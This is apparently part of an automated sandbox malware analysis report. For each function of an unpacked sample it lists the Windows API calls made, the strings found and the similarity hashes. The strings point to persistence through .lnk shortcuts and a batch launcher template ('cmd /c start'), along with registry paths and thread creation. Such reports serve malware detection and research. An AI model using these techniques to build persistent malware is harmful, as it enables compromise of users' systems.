                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 00422CA7
                          • CloseHandle.KERNEL32(00000000), ref: 00422E22
                          • LocalFree.KERNEL32(?), ref: 00422E6E
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: Wait$ObjectSingle$CloseFreeHandleLocalMultipleObjects
                          • String ID:
                          • API String ID: 960796149-0
                          • Opcode ID: 926079ce3b34f8aa2bebee9943d390324f444ca90cabbcbdb484abdf5ec99831
                          • Instruction ID: e61ef60d893c71df151f921427a0a639f3976ef8da9708c7d2e896f1f2b42219
                          • Opcode Fuzzy Hash: 926079ce3b34f8aa2bebee9943d390324f444ca90cabbcbdb484abdf5ec99831
                          • Instruction Fuzzy Hash: 31223274B00218EFDB24DF94ED48BEA7775BB89304F5044A9EA49A7280C7B85EC4CF55
                          Function 00416A30 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 290filestringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpyW.KERNEL32(00000000,00000000), ref: 00416AB9
                          • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00416AED
                          • GetFileSize.KERNEL32(000000FF,00000000), ref: 00416B06
                          • ReadFile.KERNEL32(000000FF,00000000,000000FF,?,00000000), ref: 00416B44
                          • CloseHandle.KERNEL32(000000FF), ref: 00416B5A
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CloseCreateHandleReadSizelstrcpy
                          • String ID: .DLL$P{A
                          • API String ID: 3530118091-1392461530
                          • Opcode ID: 7472eaf7f6e632be50e5b3be10fa481bc85ba020c02400b5772d393eb835cb27
                          • Instruction ID: 8f496f5161c6566fac696d600ad60fdf2f328ff75d08b78d54c198b0cf88cc25
                          • Opcode Fuzzy Hash: 7472eaf7f6e632be50e5b3be10fa481bc85ba020c02400b5772d393eb835cb27
                          • Instruction Fuzzy Hash: 7AC15E75E00208DBDB18DFE4D889BEEBB75FF48305F108529E615AB290D738A985CB58
                          Function 00410AA0 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 175stringCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: __snwprintf_memset$lstrlen
                          • String ID: %s\%s$%s\*.*$%s\System32$\\?\%s
                          • API String ID: 4132764700-2457321626
                          • Opcode ID: 2e104d4a2d1b0ff43874da9a51cd1285d1648299e552af9c124d82d4cbfd87bb
                          • Instruction ID: c6e62e2073b034a599f52fdef3a3bee758a209303a2989893499197f23e9dd42
                          • Opcode Fuzzy Hash: 2e104d4a2d1b0ff43874da9a51cd1285d1648299e552af9c124d82d4cbfd87bb
                          • Instruction Fuzzy Hash: 2661D9B19002189BDB24DF60DC49FE97375FF44304F5445EAE60996180EBB99EC8CF99
                          Function 004152B0 Relevance: 21.3, APIs: 3, Strings: 9, Instructions: 286COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00421DA0: ___crtGetLocaleInfoEx.LIBCMTD ref: 00421DBD
                            • Part of subcall function 00421A20: ___crtGetLocaleInfoEx.LIBCMTD ref: 00421A3D
                          • __snwprintf.LIBCMT ref: 004155A7
                          • _memset.LIBCMT ref: 004156DF
                          • __snwprintf.LIBCMT ref: 004156FD
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: InfoLocale___crt__snwprintf$_memset
                          • String ID: $!$"$#$.DLL$.DLL$.DLL$SOFTWARE\%s$SOFTWARE\%s
                          • API String ID: 2690796221-3769927825
                          • Opcode ID: f9cd9e4cee2ffa15f8856f482cae3081484cdc176ce1f74312dfdd2214a7b222
                          • Instruction ID: 29602d9c3e6b9ea0e454eb130913dbd66f16fbe119040890b5bd64aaf47d0f05
                          • Opcode Fuzzy Hash: f9cd9e4cee2ffa15f8856f482cae3081484cdc176ce1f74312dfdd2214a7b222
                          • Instruction Fuzzy Hash: 29D117B1900218DBEB24DF60DC49BEEB7B5FB44304F5081E9E549A7281DBB99AC4CF94
                          Function 00418A30 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 176stringmemoryCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00414506,00436450), ref: 00418A59
                          • _memmove.LIBCMT ref: 00418A88
                          • lstrlenW.KERNEL32(?), ref: 00418AAC
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00418ABF
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlen$AllocLocal_memmove
                          • String ID: PdC$PdC$PdC
                          • API String ID: 39496755-1398650270
                          • Opcode ID: 981e1c8220d340e5c2f2801dab2990c43d3c98a0d4b8735d5e8a3246bc3149fb
                          • Instruction ID: 68aedf7bfef8d849f7c6093bd49c9ebc40dcd1fcc69a5c87191b9df558053d57
                          • Opcode Fuzzy Hash: 981e1c8220d340e5c2f2801dab2990c43d3c98a0d4b8735d5e8a3246bc3149fb
                          • Instruction Fuzzy Hash: E5711BB4A0420EEFCB14CF98D581AEEB7B1FF48304F10855AE915A7340D734AA96CFA5
                          Function 004179E0 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 145threadstringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlenW.KERNEL32(00473F0C), ref: 004179EE
                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00417A00
                          • CreateThread.KERNEL32(00000000,00000000,00408670,00000000,00000000,00000000), ref: 00417A23
                          • LocalFree.KERNEL32(?), ref: 00417A41
                          • _memset.LIBCMT ref: 00417ABA
                          • __snwprintf.LIBCMT ref: 00417ADF
                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00417B64
                          • CreateThread.KERNEL32(00000000,00000000,0040BCA0,00000000,00000000,00000000), ref: 00417B87
                          • CloseHandle.KERNEL32(?), ref: 00417BA4
                          • CreateThread.KERNEL32(00000000,00000000,0041C690,00000000,00000000,00000000), ref: 00417BD5
                          • CreateThread.KERNEL32(00000000,00000000,00422100,00000000,00000000,00000000), ref: 00417BEF
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: Create$Thread$Event$CloseFreeHandleLocal__snwprintf_memsetlstrlen
                          • String ID: "%s%s"
                          • API String ID: 4079218935-1694057794
                          • Opcode ID: cf5a036f5783a1a5fa6017972896ae79ee644f8f8522a0a03c43ea90ec11181c
                          • Instruction ID: 1e84fd0bc2520909827c6edb8f866b7a07077475007cd2de4b7a526a35a9f6c2
                          • Opcode Fuzzy Hash: cf5a036f5783a1a5fa6017972896ae79ee644f8f8522a0a03c43ea90ec11181c
                          • Instruction Fuzzy Hash: 79515170A88314ABE724AB60EC4AF953674A704705F10457AF30DA92E1D7F865C4CF5E
                          Function 00417C20 Relevance: 21.1, APIs: 14, Instructions: 80synchronizationCOMMON
                          Download Yara Rule
                          APIs
                          • SetEvent.KERNEL32(?,?,0041CF6E), ref: 00417C3C
                          • WaitForSingleObject.KERNEL32(?,000000FF,?,0041CF6E), ref: 00417C54
                          • CloseHandle.KERNEL32(?,?,0041CF6E), ref: 00417C6A
                          • SetEvent.KERNEL32(?,?,0041CF6E), ref: 00417C7F
                          • WaitForSingleObject.KERNEL32(?,000000FF,?,0041CF6E), ref: 00417C97
                          • CloseHandle.KERNEL32(?,?,0041CF6E), ref: 00417CAD
                          • CloseHandle.KERNEL32(?,?,0041CF6E), ref: 00417CC2
                          • SetEvent.KERNEL32(?,?,0041CF6E), ref: 00417CD8
                          • WaitForSingleObject.KERNEL32(?,000000FF,?,0041CF6E), ref: 00417CF0
                          • CloseHandle.KERNEL32(?,?,0041CF6E), ref: 00417D05
                          • SetEvent.KERNEL32(?,?,0041CF6E), ref: 00417D1B
                          • WaitForSingleObject.KERNEL32(?,000000FF,?,0041CF6E), ref: 00417D33
                          • CloseHandle.KERNEL32(?,?,0041CF6E), ref: 00417D48
                          • CloseHandle.KERNEL32(?,?,0041CF6E), ref: 00417D5E
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$EventObjectSingleWait
                          • String ID:
                          • API String ID: 2857295742-0
                          • Opcode ID: 18f77922ecc03a40f4af42e35ac647b1a9a6bbc2ecd4e509e15d828aaf2342cc
                          • Instruction ID: 2efe401ad2e9334bd799c32a11dda1ac67e07a7c7ed7506ab771460a2d4acc6e
                          • Opcode Fuzzy Hash: 18f77922ecc03a40f4af42e35ac647b1a9a6bbc2ecd4e509e15d828aaf2342cc
                          • Instruction Fuzzy Hash: 8731B971118200DBD328AFA4FC4CBA637B6B745315F145639E21A966B0D778A8CDCF9C
                          Function 0040EE20 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 190fileCOMMON
                          Download Yara Rule
                          APIs
                          • __snwprintf.LIBCMT ref: 0040EE72
                            • Part of subcall function 0040C970: lstrlenW.KERNEL32(?), ref: 0040C9D6
                            • Part of subcall function 0040C970: lstrlenW.KERNEL32(00473898), ref: 0040C9E9
                            • Part of subcall function 0040C970: __snwprintf.LIBCMT ref: 0040CA2A
                            • Part of subcall function 0040C970: lstrlenW.KERNEL32(00000000), ref: 0040CA36
                          • __snprintf.LIBCMT ref: 0040EECE
                          • __snwprintf.LIBCMT ref: 0040EF25
                          • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040EF33
                          • __snwprintf.LIBCMT ref: 0040EF89
                          • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 0040EFAB
                          • WriteFile.KERNEL32(000000FF,00000000,?,00000000,00000000), ref: 0040EFD7
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: __snwprintf$lstrlen$CreateFile$DirectoryWrite__snprintf
                          • String ID: %s\%s$%s\%s.lnk$%s\%s\%s.bat$@echo offcmd /c start "" "%S%S" %S
                          • API String ID: 2767719528-1386577
                          • Opcode ID: 8c6961f4528bbf1dc82015b1292462afdd969989bb4a2a64a326a4bf5295b5cd
                          • Instruction ID: 971959146bbf60309bda4c3585695e493e9737ae057980748b5e679c907677e4
                          • Opcode Fuzzy Hash: 8c6961f4528bbf1dc82015b1292462afdd969989bb4a2a64a326a4bf5295b5cd
                          • Instruction Fuzzy Hash: 52716C75A00309EBDB24DBA4DC4AFEE7775EB48701F50853AF605B62D0D7B8A844CB68
                          Function 00418DA0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 171stringmemoryCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlen$AllocLocal_memmove
                          • String ID: xC@
                          • API String ID: 39496755-137084332
                          • Opcode ID: 431c75bd026fb3df7fba93fc785fa514b6504ff4283ddb5b02a671c23b6106b3
                          • Instruction ID: 0321d05b353010604045e4ed6f8dda335a2f1adca3c4faa2617fbbc6ac746380
                          • Opcode Fuzzy Hash: 431c75bd026fb3df7fba93fc785fa514b6504ff4283ddb5b02a671c23b6106b3
                          • Instruction Fuzzy Hash: F471EC71A0020ADFCF04CF94D581AEEB7B2FF88309F10855AE905A7341D734AA95DB99
                          Function 0041CA00 Relevance: 16.6, APIs: 11, Instructions: 111memoryCOMMON
                          Download Yara Rule
                          APIs
                          • LocalAlloc.KERNEL32(00000040,-00000001,?,0041C941,00000000,00000000,0047FD50,0047FDF8), ref: 0041CA0F
                          • _memmove.LIBCMT ref: 0041CA2E
                          • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,0041C941,00000000,00000000), ref: 0041CA54
                          • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,0041C941,00000000), ref: 0041CA9A
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Free$Alloc_memmove
                          • String ID:
                          • API String ID: 3668202806-0
                          • Opcode ID: 65377767a46e38a21d81c307e51a3aaf70246de7b61b9ede19e034912b4f5e09
                          • Instruction ID: 1a7d30cbbf34fcf49ee489ded3f490f3b4d58d67926835386e4b737b527f203e
                          • Opcode Fuzzy Hash: 65377767a46e38a21d81c307e51a3aaf70246de7b61b9ede19e034912b4f5e09
                          • Instruction Fuzzy Hash: 4A411D75A04208EFCB04DFA4ED89BAE77B5BF48305F104569EA06E7390D634AA40DB59
                          Function 004173D0 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 292stringCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: __snwprintf_memsetlstrcpy
                          • String ID: .DLL$SOFTWARE\%s
                          • API String ID: 521008980-3069316046
                          • Opcode ID: 9ebcd539357f304ded1ed9b7e6530470ee6f84a92c98e70a059279702585c1ab
                          • Instruction ID: 061ff039704dbbb5a9c980faa0d7e9563e44c02e1835b212fb41c1367a67d3a3
                          • Opcode Fuzzy Hash: 9ebcd539357f304ded1ed9b7e6530470ee6f84a92c98e70a059279702585c1ab
                          • Instruction Fuzzy Hash: FCD13B74E042189FDB24DF64DC8DB9AB7B5BF48304F1085A9E10DAB290DB74AAC4CF55
                          Function 0041AD90 Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 276COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: <$HEAD$NTDLL.DLL$RtlTimeToSecondsSince1970$application/octet-stream$text/plain
                          • API String ID: 0-1210979922
                          • Opcode ID: 8a854edcfc726516ae931456b6be808b10e8c2bb7b4583638377db0229e2a70c
                          • Instruction ID: 405cadcc4ae59f2de3bc6ef5f8cc646fae5b32c80b134a876cf1c737a3f7cba7
                          • Opcode Fuzzy Hash: 8a854edcfc726516ae931456b6be808b10e8c2bb7b4583638377db0229e2a70c
                          • Instruction Fuzzy Hash: 52C11BB0A00318EFDB14DFA4CC99BDEBBB5FB48701F108569E609AB284D7B45988CF55
                          Function 004184F0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 97threadsynchronizationCOMMON
                          Download Yara Rule
                          APIs
                          • WaitForSingleObject.KERNEL32(?,00000000,?,0041824B,?), ref: 0041852B
                          • CloseHandle.KERNEL32(00000000,?,0041824B,?), ref: 00418563
                          • CloseHandle.KERNEL32(00000000,?,0041824B,?), ref: 00418583
                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,0041824B,?), ref: 0041859B
                          • CreateThread.KERNEL32(00000000,00000000,?,?,00000004,00000000), ref: 004185BA
                          • ResumeThread.KERNEL32(00000000), ref: 004185E8
                          • CloseHandle.KERNEL32(00000000), ref: 004185FE
                          • CloseHandle.KERNEL32(00000000), ref: 00418608
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$CreateThread$EventObjectResumeSingleWait
                          • String ID: d
                          • API String ID: 144976343-2564639436
                          • Opcode ID: d1515b2a01f9cc173bf3a8bf0f378ef2aae27ebe93373796e2f4d55a75ad8670
                          • Instruction ID: 186593196a1ecf41a89da0a8a597543fa85425d85024d01c85a3f81d9e28e41a
                          • Opcode Fuzzy Hash: d1515b2a01f9cc173bf3a8bf0f378ef2aae27ebe93373796e2f4d55a75ad8670
                          • Instruction Fuzzy Hash: 5E4129B4A04219EFDB04CF94C889BEEB7B1FB48304F24C559EA15A7390C774A985CF94
                          Function 0040FCB0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 95fileCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: __snwprintf$DeleteFile$DirectoryRemove
                          • String ID: %s\%s$%s\%s.lnk$%s\%s\%s.BAT
                          • API String ID: 2831937974-377014195
                          • Opcode ID: ebbc63302c9e9da6ef6929f7def577c1286f899edd113e903190f628315d9dca
                          • Instruction ID: 502d59184f1d51a49b81e69d81b1d1801d79e3a13ea6940f5c91cac4a1307416
                          • Opcode Fuzzy Hash: ebbc63302c9e9da6ef6929f7def577c1286f899edd113e903190f628315d9dca
                          • Instruction Fuzzy Hash: F6319075A40309BBDB14EBA0DD0AFAE7779EF48700F600439F605B62C0D7B8A944CB58
                          Function 0041BD40 Relevance: 15.1, APIs: 10, Instructions: 72windowregistryCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleW.KERNEL32(00000000), ref: 0041BD48
                          • _memset.LIBCMT ref: 0041BD5B
                          • RegisterClassW.USER32(?), ref: 0041BD7E
                          • GetLastError.KERNEL32 ref: 0041BD90
                          • CreateWindowExW.USER32(00000000,0047B6BA,004392B4,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 0041BDC4
                          • GetMessageW.USER32(?,?,00000000,00000000), ref: 0041BDE7
                          • TranslateMessage.USER32(?), ref: 0041BDF5
                          • DispatchMessageW.USER32(?), ref: 0041BDFF
                          • DestroyWindow.USER32(?), ref: 0041BE0D
                          • UnregisterClassW.USER32(0047B6BA,?), ref: 0041BE25
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: Message$ClassWindow$CreateDestroyDispatchErrorHandleLastModuleRegisterTranslateUnregister_memset
                          • String ID:
                          • API String ID: 1736019982-0
                          • Opcode ID: 44b9b3d491ba77a891f52e8e7580a13877c4ddd922de42ec48cc47b0145aa3e0
                          • Instruction ID: ab45f3a09088af48425ac5202502134bd08f2805e4d7476bd65ed2b970070986
                          • Opcode Fuzzy Hash: 44b9b3d491ba77a891f52e8e7580a13877c4ddd922de42ec48cc47b0145aa3e0
                          • Instruction Fuzzy Hash: B1213375940304ABDB249FA0EC4DBEE7B74EB94701F108436EA069A290DB7465C5CBE9
                          Function 0040C620 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 136fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0040C970: lstrlenW.KERNEL32(?), ref: 0040C9D6
                            • Part of subcall function 0040C970: lstrlenW.KERNEL32(00473898), ref: 0040C9E9
                            • Part of subcall function 0040C970: __snwprintf.LIBCMT ref: 0040CA2A
                            • Part of subcall function 0040C970: lstrlenW.KERNEL32(00000000), ref: 0040CA36
                          • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040C653
                          • wsprintfW.USER32 ref: 0040C69F
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040C6CA
                          • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000), ref: 0040C721
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlen$CreateFile$DirectoryModuleName__snwprintfwsprintf
                          • String ID: %s%s$P
                          • API String ID: 1009040823-50959982
                          • Opcode ID: 5292d5db4555a1c5aa8fd0db72429abaa3b28a06d0d6de492e022048b028ae9a
                          • Instruction ID: 75b5acf5dcd845ec379369acad90d19d1c3fdf2c27c587a6b54d3358a801ef79
                          • Opcode Fuzzy Hash: 5292d5db4555a1c5aa8fd0db72429abaa3b28a06d0d6de492e022048b028ae9a
                          • Instruction Fuzzy Hash: 64514171900219EBDB24DBE4EC8CB9E7774EB48311F1082A6E519B62D0C7789E84CF59
                          Function 004108D0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 114stringCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: __snwprintflstrlen$_memmove_memset
                          • String ID: %s\System32$\\?\%s
                          • API String ID: 1226727644-2868705786
                          • Opcode ID: 6e8f4d0e67aae0e810d07d34e97196b1f2a4ac454217211d54e26313eb623a2c
                          • Instruction ID: f7fbbe4a236fc53dca6a2b04c866a4db5b7b1190c58fbd2958e5bb8130a35a9c
                          • Opcode Fuzzy Hash: 6e8f4d0e67aae0e810d07d34e97196b1f2a4ac454217211d54e26313eb623a2c
                          • Instruction Fuzzy Hash: FD416175A80218ABCB24EBA0DD8DBDD73B4EF58701F1045E9E509A6290D7B85EC4CF58
                          Function 0041FCA0 Relevance: 13.7, APIs: 9, Instructions: 158memoryCOMMON
                          Download Yara Rule
                          APIs
                          • LocalAlloc.KERNEL32(00000040,00000FA0), ref: 0041FCE9
                          • und_memcpy.LIBCMTD ref: 0041FD0F
                          • und_memcpy.LIBCMTD ref: 0041FD2A
                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0041FD48
                          • LocalFree.KERNEL32(00000000), ref: 0041FD64
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocLocalund_memcpy$FreeVirtual
                          • String ID:
                          • API String ID: 2616075706-0
                          • Opcode ID: 74adb7b3c462bd493814b274d57370fe2bf3f9e63b67a0c32c4d5959d5e495a5
                          • Instruction ID: 896d9bbf9812bbf6fee41916b536506549fc29dea3f44346001a24c4f2589f43
                          • Opcode Fuzzy Hash: 74adb7b3c462bd493814b274d57370fe2bf3f9e63b67a0c32c4d5959d5e495a5
                          • Instruction Fuzzy Hash: 3771E575A00628CBCB64CF54DC84BEDB7B5AF98309F1481E9E50DAB351DA34AEC68F44
                          Function 00422F70 Relevance: 13.6, APIs: 9, Instructions: 109stringsynchronizationCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpyA.KERNEL32(0047FF48,0047C710), ref: 00422FC4
                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00423006
                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 00423017
                          • lstrcpyA.KERNEL32(?,0047FD50), ref: 00423064
                          • ReleaseMutex.KERNEL32(?), ref: 00423079
                          • ReleaseMutex.KERNEL32(?), ref: 0042302B
                            • Part of subcall function 00423100: lstrlenW.KERNEL32(?), ref: 00423119
                          • lstrcpyA.KERNEL32(0047FF48,?), ref: 004230BF
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$MutexReleaseWait$MultipleObjectObjectsSinglelstrlen
                          • String ID:
                          • API String ID: 1097325810-0
                          • Opcode ID: 821b3ecb837ab590a6ff4c2b44fcedddb81928fd439c30ca57b8ba89f3a1609e
                          • Instruction ID: 16d82323eab8fe0889115499996e689acd0b379d9a67a3ef51016832aa5a728f
                          • Opcode Fuzzy Hash: 821b3ecb837ab590a6ff4c2b44fcedddb81928fd439c30ca57b8ba89f3a1609e
                          • Instruction Fuzzy Hash: AA41B670B04214EFC728DFA4EC49F9E77B4BB48701F20853AE51A93294D7796984CB5D
                          Function 0041D320 Relevance: 13.6, APIs: 9, Instructions: 95threadmemoryCOMMON
                          Download Yara Rule
                          APIs
                          • LocalAlloc.KERNEL32(00000040,00000014), ref: 0041D32A
                          • CreateThread.KERNEL32(00000000,00000000,0041D440,00000000,00000000,00000000), ref: 0041D371
                          • WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF), ref: 0041D3CB
                          • GetExitCodeThread.KERNEL32(00000000,?), ref: 0041D3E2
                          • CloseHandle.KERNEL32(00000000), ref: 0041D3F1
                          • LocalFree.KERNEL32(00000000), ref: 0041D3FB
                          • TerminateThread.KERNEL32(00000000,00000000), ref: 0041D416
                          • CloseHandle.KERNEL32(00000000), ref: 0041D420
                          • LocalFree.KERNEL32(00000000), ref: 0041D42A
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: LocalThread$CloseFreeHandle$AllocCodeCreateExitMultipleObjectsTerminateWait
                          • String ID:
                          • API String ID: 872497719-0
                          • Opcode ID: 5ed7423fb5cecc2500752e8c116bf73243fd794aab3f643aef1d3c47cd37cb60
                          • Instruction ID: 9f48c58a442aec97a04834a521b677f27ce6a3c23ab1282491cae343aeabad6e
                          • Opcode Fuzzy Hash: 5ed7423fb5cecc2500752e8c116bf73243fd794aab3f643aef1d3c47cd37cb60
                          • Instruction Fuzzy Hash: 7341B4B8E04208EFCB08DF94D984BDDBBB5FB88314F208559EA15A7394C734AA81CF55
                          Function 0040D050 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 404COMMON
                          Download Yara Rule
                          APIs
                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0040D7DD
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: FreeVirtual
                          • String ID: @$_DllMain@12
                          • API String ID: 1263568516-1064695914
                          • Opcode ID: 0b5fea6523ada42aaec58af214fcb1f894e4b54d776377398d842d2cd266bdef
                          • Instruction ID: 01e7d303157ac589c17df2b98c965f4fab38d216f3b26439a1c5c060f512db2d
                          • Opcode Fuzzy Hash: 0b5fea6523ada42aaec58af214fcb1f894e4b54d776377398d842d2cd266bdef
                          • Instruction Fuzzy Hash: EA22AD74A01228CBDB24CF54CD94BE9B7B1BF89309F1081EAD409AB385D735AE85CF85
                          Function 00406DB0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 283COMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 00406DCA
                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000004), ref: 00406E85
                          • _memmove.LIBCMT ref: 00406EAF
                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 00406F60
